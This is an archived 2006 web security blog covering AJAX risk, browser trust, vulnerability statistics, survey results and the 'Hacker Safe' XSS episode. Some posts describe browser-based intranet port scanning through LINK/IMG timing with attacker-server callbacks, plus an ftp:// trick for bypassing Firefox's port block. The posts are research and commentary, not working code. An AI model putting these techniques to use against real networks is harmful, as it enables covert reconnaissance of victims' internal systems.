Thursday, November 30, 2006

"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does."read more...

Wednesday, November 29, 2006

Many respected experts prior to me, including Bruce Schneier, have explained the faults of trusting client-side software. Not trusting the client has been widely accepted for a long time. And in kind I’ve repeated the mantra “never ever ever ever trust the client (or user-supplied content)” many times when it comes to web application security. Then I found myself reading one of RSnake’s posts and something he wrote caused me think about client-side security in a new way. It occurred to me that maybe we’re wrong. Maybe we already do trust the client, or in our case here the web browser. And maybe we have no choice but to continue doing so.

RSnake:"I guess we have pretty much completely broken the same domain policies of yesterday. If I can scan your Intranet application from an HTML page without JavaScript or Java or any DHTML content whatsoever I think it’s time to start revisiting the entire DOM security model. That might just be my opinion but come on. What else do we have to do to prove it’s not working?"

He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?

You see when a user logs-in to a website, the first thing they must have is a reasonable assurance that the web page their visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display the user could be tricked into handing over their username/password to an attacker. Which of course could in-turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.

This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the web-browser-web server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens) the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation otherwise back to plaintext we go.

In exchange for a correct username/password combination the user’s browser receives for a cookie storing their session ID. The browser is the protector of this important key because if it’s stolen, then likely the user account and their data go with it. The website is trusting that the same-origin and cookie security policies imposed by the browser will keep the session ID (cookies) safe. But anyone familiar with XSS, using some JavaScript and Flash Malware, know that is hardly the case. And besides browser vulnerabilities routinely exposed this information through exploits. No joy here.

Another example is websites rely on web browsers to safeguard history/cache/bookmarks/passwords and everything else containing sensitive information or granting access to it. And as we well know, all of these areas are again routinely exposed through browser vulnerability exploits or clever JavaScript Malware hacks. Inside the browser walls is everything an attacker needs to hack our websites. Websites become highly dependent on web browsers keeping this data safe. Unfortunately they rarely do.

So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.

"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."

We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!

The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)

How bad is it out there? 8 out and 10 websites are vulnerable, but how severe are they.

The likelihood of a website having a high or medium severity vulnerability, by class.

While researching Browser Port Scanning without JavaScript, I wanted to find a way to get the browser to kill its connections and move on to the next IP Address. Similar to JavaScript Port Scanning with window.stop() since the timeout period is quite long and needed to speed the process. I figured a meta refresh was the way to go after waiting 5 seconds. Like so:

What I found was that while the LINK HTTP request is waiting, META refreshes won’t fire until is resolved. Weird. Again, I don’t know how this is useful, yet, but it could be for something in the future.

I think it was RSnake who found this first, but the blocking mechanism seems to be only applied to the http protocol handler. Odd. Using the ftp protocol handler, we can bypass the block like so: ftp://jeremiahgrossman.blogspot.com:22/ If the port is up, it'll connect, if not, timeout.

I believe this technique could be used to improve JavaScript Port Scanning, where we’re currently only scanning horizontally for web servers (80/443). Instead we may be able to perform vertical port scans on the remaining ports and bypass the imposed restrictions. Perhaps also useful for the Browser Port Scanning without JavaScript technique.

While researching different hacks and attack/defense techniques, it’s common to uncover odd behavior in software, especially in web browsers. I’ve also found various oddities point me in the direction of a vulnerabilities or sometimes tricks that become useful as part of another hack. Anyway, here’s some strangeness in Firefox that other might find interesting.

Tuesday, November 28, 2006

Update 2: Ilia Alshanetsky has already found a way to improve upon the technique using the obscure content-type "multipart/x-mixed-replace". There's a great write up and some PHP PoC code to go with it. Good stuff! RSnake has been coveringthe topic as well.Update: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.

Since my Intranet Hacking Black Hat (Vegas 2006) presentation, I've spent a lot of time researching HTML-only browser malware since many experts now disable JavaScript. Imagine that! Using some timing tricks, I "think" I've discovered a way to perform Intranet Port Scanning with a web browser using only HTML. Unfortunately time constraints are preventing me from finishing the proof-of-concept code anytime soon. Instead of waiting I decided to describe the idea so maybe others could try it out. Here's how its supposed to work... there are the two important lines of HTML:

HTML is hosted on an "attacker" control website.

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. One the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (when the web page was dynamically generated) its possible to tell if the host is up. If the time difference is less than say 5 seconds then likely the host is up, if more, then the host is probably down (browser waited for timeout). Simple.

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276Current epoch: 1164762279 (3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276Current epoch: 1164762286(10 second delay) - Host is down

A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAMES HTML connections, which seemed to work.

I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.

Monday, November 27, 2006

The vast majority of infosec magazines I read are aweful, (IN)SECURE Magazine is not one of them. I've been reading since the first issue and most of the article content is quality. Good job to the contributing writers and editors over there. I haven't read issue #9 yet, but I plan to this week.

Wednesday, November 22, 2006

I’m frequently asked about “completeness” when it comes to vulnerability scanning/assessments. “How do you know if all the vulnerabilities have been found?” The short answer is you don’t. Then I proceed to describe the reasons. What got me thinking was why this question is asked so often. I think the answer is only obvious to those experienced in web application security. These are faulty assumptions routinely carried over from network vulnerability scanning world that do not apply to webappsec.

In network scanning the list of “well-known” vulnerabilities is large, but also finite. Databases such as OSVDB, SecurityFocus, MITRE (CVE), and others catalog the known universe of issues. Vulnerability coverage by network scanners is likely close to 100%. In “custom” web applications the luxury of well-known vulnerabilities or database repositories vanishes. Each new vulnerability identified is more or less a one-off / zero-day issue. Just as with bugs in application code, we truly never know how many vulnerabilities exist in a web bank, e-commerce store, payroll system, or any other custom web application. The upper bound in an unknown. Therefore we can never know for sure if any scan/assessment found them all. Vulnerability coverage could be as low as 10-20% or higher in the range of 80-90% or more. The point is we don’t know, its difficult to measure, and changes with each website.

This is a big reason why I’ve been talking a lot about measuring security recently. I’m a big believer in it. Who isn’t? I even took a shot at a Methodology for Comparing Web Application Vulnerability Assessment Solutions. Figured we could use time-it-takes-to-hack-a-website as something we could reliably measure. For some reason I hadn’t got much feedback on the idea. Likely because there hasn’t been customer demand as they’re not REALLY aware of the fact that everything isn’t being found. Whether my methodology works or not, we’re going to need to figure this out. Once customers of ANY webappsec VA solutions gets hacked due to missed vulnerabilities, there’s going to be hell to pay.

Monday, November 20, 2006

Defense-in-depth, a concept which most agree with, is where multiple layers of security are protecting the crown jewels. The idea is should any layer fail, which inevitably happens, you’re still protected. Nice. In network security there are firewalls, vulnerability assessment, IDS/IPS, patch and config management, training, encryption, anti-virus, etc. each mitigating some risk. As good as they are we know these traditional solutions they’re not perfect and don’t help much in webappsec. We need to develop a new set of layers. The problem is we haven’t figured out or agreed upon which layers the modern webappsec infrastructure is supposed to have.

It’s really important that we do or at least start the dialog about what’s working and what’s not.

Here’s what we know. Security inside the SDLC eliminates flawed code, not all. Vulnerability assessments identify vulnerabilities, and miss some. WAF’s and IDS’s spot and block attacks, some will pass through. We can train ourselves to be experts in some things, but not everything. Patching and configuration protects from the known, not the unknown. Encryption protects data from prying eyes, not all the time. Sure, these solutions are not perfect, nothing is. That’s the point of implementing defense-in-depth. Maximize the strength of the available solutions and mitigate they’re weaknesses to protect the organizational assets.

Let me put this question out there… if you could implement 3 action items to protect a website, above and beyond the normal network security stuff, what would they be?

A couple days ago I mentioned that I expected to see more people writing about their experiences with web applications vulnerability assessment solutions. Today Anurag Agarwal released a nice comparison between Appscan vs Webinspect. Good stuff. Anurag also has some several other good posts and articles, worth taking the time to click through them.

Several people asked me off-line what application I used to create those pretty 3D graphs from earlier posts. The answer is Keynote, OS X's equivilent to Powerpoint, since I'm an MacBook user. The graphs are easy to make and look reallycool. The only thing I haven't been able to figure out is how to make curved line graphs. There probably is a way....

Sunday, November 19, 2006

During online account registration we all come across those obnoxious End User License Agreements (EULA’s) asking us to “agree” to who knows what. Personally I like editing them …to well… something else. Or just delete. (I’m not going to get into the legalities modifying EULA’s. IANAL.) The problem is clickable EULA’s are often locked inside read-only HTML textareas where the web browser won’t allow them to be edited. To get around this minor annoyance I created this handy little Edit EULA bookmarklet. Drag it to your bookmarks toolbar, and when you see a read-only textarea, click the bookmarklet and edit away! Enjoy!

Friday, November 17, 2006

What vulnerabilities (blackbox / whitebox) scanners can and can't find is one of the most important topics in web application security. Innovation is this area will inevitably determine the industry accepted vulnerability assessment methodology. Online business depends on this problem being addressed with right blend of coverage, ease-of-use, and price. For us vendors it’s a battleground for which solutions will ultimately be successful in the market. Competitors who do not adapt and push the technology limits will not be around long. I’ve seen this coming for a while. To the delight of many and frustration of some I’ve offered presentations, released articles, and written blog posts.

Since founding WhiteHat Security I’ve long believed that there was no way a scanner, built by me or someone else, could identify anywhere close to all the vulnerabilities in all websites. For years was I had no good way to explain or justify my position. It wasn’t until I read a fascinating Dr. Dobbs's article (The Halting Problem) from 2003 that established the basis of my current understanding. To quote:

"None other than Alan Turing proved that a Turing Machine (and, thus, all the computers we're interested in these days) cannot decide whether a given program will halt or run continuously. By extension, no program can detect all errors or run-time faults in another program."

Brilliant! This article instantly sparked my interest in the halting problem, undecidable problem, and a bunch of other mathematical proofs. Taking what I had learned, I later introduced the “technical vulnerabilities” and “business logic flaws” terminology during a 2004 Black Hat conference. I guess people enjoyed the terminology because I frequently see others using it. Loosely described, technical vulnerabilities are those that can be found by scanners and business logic flaws must be found by humans (experts).

What needs to be understood is finding each vulnerability class is not exclusive to a single method of identification. Scanners and humans can in fact identify both technical and logical vulnerabilities. How effective they are is the real question. Observe the following diagram. (Don’t take the numbers too literally, the diagram is meant to enforce concepts more than precise measurements.)

Scanners are way more adept at finding the majority of technical vulnerabilities. Mostly because of the vast number of tests required to be exhaustive is too time consuming for a human (expert).

Humans (experts) are much better quited at finding business logic flaws. The issues are highly complex and require contextual understanding, which scanners (computers) lack.

Neither scanner nor human will likely or provably reach 100% vulnerability coverage. Software has bugs (vulnerabilities) and that will probably remain the case for a long time to come.

The coverage scales will slide in different directions with each website encountered. A while back I posted some stats on how vulnerabilities are identified here at WhiteHat. Based on 100 websites, here are the findings.

This numbers are neat on a variety of level. As more people dive into web application security inevitably we’ll see more measurements, reviews, and statistics released. The cloud of the unknown will lift and the most effective assessment methodology will reveal itself. I welcome this trend as I think I'm on the right track. Brass tax...

From what I've seen, malicious web attacks typically target websites on a one-by-one basis rather than shotgun blast approach. The bad guys aren’t using commercial scanners, performing full-blown assessments, or even open source tools for that matter. Frankly because they don’t need to. A web browser and a single vulnerability is all the really need to profit. That’s why I’ve been harping on comprehensiveness and measuring the effectiveness of the assessment methodologies for so long. Finding some of vulnerabilities, some of the time, on some of the websites - ain’t going to cut it. You will get hacked this way. We need to find them all, all of the time, and as fast as possible.

My crystal ball (1-3 years):1) Standalone back box scanners will transfer from the hands of security personnel to those in development and QA – they’ll merge with the white box scanners and finally tightly integrate inside of established IDE’s.2) The one-off vulnerability assessment market (professional services) will give way to managed service model, just like they already have in the network VA world.3) Majority industry consolidation will occur as customers look for singular security vendors that can address the entirety of their vulnerability stack.

Tuesday, November 14, 2006

Update: Thanks again to all those whom responded to the survey. 48 respondents, doubling my first attempt of 21, and a good representative split between security vendors and enterprise professionals. The results are below. I may make this survey a monthly activity provided the responses is good and people find the data helpful.

My Observations- I was a bit amazed by the significant portion of web application VA’s combining the black box and white box testing methods. I knew black box would be the most common approach, but I would have figured the pure source code reviews and the combo approach would have been statistically swapped. I may need to dig in more here and ask what the benefits people are seeing as a result.

- 73% of those performing web application vulnerability assessments are not using or rarely using commercial scanner products. It’s hard to say if this is good/bad/increasing/decreasing or otherwise. Certainly people want tools. People love their open source tools as a vast majority are using them. Be mindful that open source webappsec tools are mostly productivity tools, not scanners like we asked about in #3, so they’re not opting for one over the other. There is a lot of room to dig in here with future question as to why people use or don’t use certain types of products.

- People see XSS as slightly more dangerous and widespread over SQL Injection. But what’s clear is they find both issues important and weigh them heavily over the rest. Also surprising was prior to the survey, I would have though few assessors would be checking for CSRF issues. The fact is most of them are testing for CSRF at least some portion of the time. And imagine this issue is not on any vulnerability list. This will change soon.

- 3/4 of assessors agree more than 50% of websites have serious vulnerabilities. They also believe it would take them less than a day to find a serious issue in most of them. And 65% of assessors alredy knew of a previously undisclosed incident (web hack) that led to fraud, identify theft, extortion, theft of intellectual property, etc. That’s a sobering trifecta for the state of web application security.

- When asked what activity most improve security - modern software development frameworks, secure software and/or awareness training, and a stronger security presence in the SDLC were evenly split across the range. With the exception of industry regulation which assessors felt was not a driver of security. Interesting.

DescriptionSeveral weeks ago I sent out an informal email survey to several dozen people who work in web application security professional services, an informal email survey consisting of a handful of multiple choice questions designed to help us understand more about the industry. The results were interesting enough to try again, this time with a few more questions and distributed to a wider audience.

If you perform web application vulnerability assessments, whether personally or professionally, then this survey is for you. I know most of us dislike taking surveys, but the more people who respond the more informative and representative the data will be.

The survey should take about 15 minutes to complete. All responses most be sent in by Nov 14.

Guidelines

Should be filled out by those who perform web application vulnerability assessments

Copy-paste the questions below into an email and send your answers to me (jeremiah __at__ whitehatsec.com)

9) How long would it take you find a single serious web application vulnerability in MOST public websites?a) Few minutesb) Hour or twoc) Day and a nightd) A few dayse) Don't know, never tried

A: 23% B: 35% C: 19% D: 2% E: 21%

10) How long after a web application vulnerability assessment are most of the severe issues resolved?a) Within hoursb) The next couple daysc) During the next scheduled software updated) Months from discoverye) Just before the next annual assessment

A: 0% B: 40% C: 30% D: 26% E: 4%

11) What organizational activity MOST improved the security of their websites?a) Using modern software development frameworks (.NET, J2EE, Ruby on Rails, etc)b) Secure software and/or awareness trainingc) A stronger security presence in the SDLCd) Compliance to industry regulationse) Other (please specify)

A: 21% B: 28% C: 21% D: 2% E: 28%

12) Are you privy to any undisclosed (not made public) malicious attacks made against a web application?(fraud, identify theft, extortion, theft of intellectual property, etc.)a) Nob) Onec) A fewd) Too many to count

"There are many challenges that web application security scanners face that are widely known within the industry however may not be so obvious to someone evaluating a product. For starters if you think you can just download, install, and run a product against any site and get a report outlining all of its risks you'd be probably be wrong."

Update: Kelly Jackson Higgins posted a follow-up, Group Tags More 'Hacker Safe' Sites, which by my reading was basically Scan Alert claiming XSS was more of a web browser vulnerability, rather than in the web server/application.

And sites flagged as XSS-vulnerable don't lose their Hacker Safe seal, he says. "The Hacker Safe seal is certification on the server-side infrastructure," Pierini says. "There are no vulnerabilities if you place an order on that site, and no vulnerabilities where someone has access to data on that server. You can't access data on that server with XSS."

I'm not going to detail out all the flaws here, most people reading here are probably well familiar anyway. Lets move on.

'Hacker Safe:' Safe for Hacker. BRUTAL. It can't be happy place today at the Scan Alert camp. They are probably fielding a lot of angry customer calls who are asking why they ended up on the wall-of-shame on sla.ckers.org. Then also perhaps a slew of calls from customers not on the list asking if Scan Alert is missing vulns in their websites. Then again, who knows, maybe the merchants won't even notice. Check out these quotes from the article:

"The hackers at sla.ckers.org are at it again, and this time they have found cross-site scripting (XSS) vulnerabilities on a dozen or so Websites emblazoned with ScanAlert's "Hacker Safe" seal."

Daniel Patterson, lead Webmaster for Shoppers Choice, says his company has since corrected the XSS vulnerability on its site and will be looking for other potential bugs. "It was surprising -- we thought we had fixed the problem a while back," Patterson says. "It is also surprising that Hacker Safe apparently had not notified us of a seemingly popular method for XSS."

That's really good Shoppers Choice was able to fix the issue based on the information obtained from sla.ckers.org. How bout that! Score for full-disclosure and business responsiveness. The bug hunters chime in...

RSnake, founder of ha.ckers.org and sla.ckers.org, says his own research has uncovered some vulnerability issues that ScanAlert missed. "I don't think Hacker Safe sites are any safer than non-Hacker Safe sites, despite their claim," he says.

So what does this mean for the Hacker Safe seal? "It seems either the Hacker Safe scans are ineffective, or they don't see it as a threat," kyran says. "I expect that if I keep searching for those sites, I will find XSS in them."

Brazilian Jiu Jitsu (BJJ) was made famous in the US by UFC champion Royce Gracie. BJJ is a grappling fighting style (ground fighting) focusing on chokes, arm/leg locks, and other moves to force your opponent to submit. BJJ is one of the more physically and mentally demanding activities I've ever done. That includes Australian Rules Football! Definitely not something for the meek or faint of heart. During the last year of training I’ve lost a lot of weight, hugely increased my stamina, plus am much stronger and faster. Also competed recently in my first tournament. I'm not sure where I'll take this, but so far I’m really enjoying it.

So what does a having a blue belt mean? The belt levels are white -> blue -> purple -> brown -> black. It typically takes 8 - 10 years of training to reach black. So in information security terms this means I'm no longer a script-kiddy n00b type that can only run Nikto and Nessus. I can use Paros and my Firefox to find some of my own vulns in Web Goat or something. :)

Enterprise security professionals have the responsibility of dealing with vulnerabilities. They have to find and fix as many issues as possible wherever they happen to pop up. Varying from one environment to the next, this can be a REALLY big job. To keep up many enlist the help of commercial and open source solutions. The problem is there are perhaps 100’s, or more, vulnerability management/assessment/scan/remediation/consulting vendors all targeting a specific niche of the vulnerability stack in their own special way. It’s a confusing landscape to say the least.In my position I get asked a lot about who covers what, how is it different from the other guy, or how good is it. I do my best to keep track of these things since it’s my business to know and want to give educated answers. I thought it would be helpful to create a couple of graphics that people researching solutions would be able to use. Less confusion = good.

The second graphic is a vulnerability scanning/assessment vendor comparison chart. Here we’re trying to answer the “who covers what question?” and a foundation to ask how they are different. I know some will vendors claim they do more that what the chart indicates, but I’m listing only their main areas of focus. If someone happens to add a web application vuln check or two, it doesn’t make them a network scanner. Likewise if web application scanners adds a few network checks, it hardly a new Nessus. A decent amount of comprehensiveness in the block is required. Enjoy!

Monday, November 06, 2006

Spent the last 10 days on Maui (where I grew up) for a family vacation. We had a fantastic time, weather was a bit rainy though still great. We set out to do a lot of different stuff from the last time. We went to the beach several times, buried Llana and Zack up to their necks in sand, built sand castles, went to a high school track meet (my 13 yr. old niece won the girls MIL varsity), trained Brazilian Jiu-Jitsu, jumped off a few waterfalls, went trick-or-treating with the kids, harvested banana stocks, chopped down a coconut tree, ate a lot of mom's Mexican food and Cupie's breaded teriyaki, planted ti leaves, jumped on the trampoline, played monopoly and scrabble, and Llana attended her 10 yr. reunion. The only negative was Alamo Renta A Car, I'll not be using them again. A few snaps below and back to work for me!

Wednesday, November 01, 2006

101,435,253 to be somewhat exact. The good folks at Netcraft posted their November 2006 Web Server Survey, which added another 3.5 million from the month before. Check this out for comparision, "The first Netcraft survey in August 1995 found 18,957 hosts". Talk about explosive growth.

Previous milestones in the survey were reached in April 1997 (1 million sites), February 2000 (10 million), September 2000 (20 million), July 2001 (30 million), April 2003 (40 million), May 2004 (50 million), March 2005 (60 million), August 2005 (70 million). April 2006 (80 million ) and August 2006 (90 million).

Then consider if you counted up the sla.ckers.org board and other places listing vulnerable websites, disclosure might reach 1,000. I also guessed in Dark Reading's "The Web App Security Gap" that maybe 10,000 websites might be professionally tested for vulnerabilities by a third-party. Could lower or higher, but I don't think I'm that far off. Anyway, that's about 1/10th of a percent of the total number of sites out there. That doesn't even qualify as a drop in the bucket. The reality is we really have no idea how secure of (in)-secure the Web is.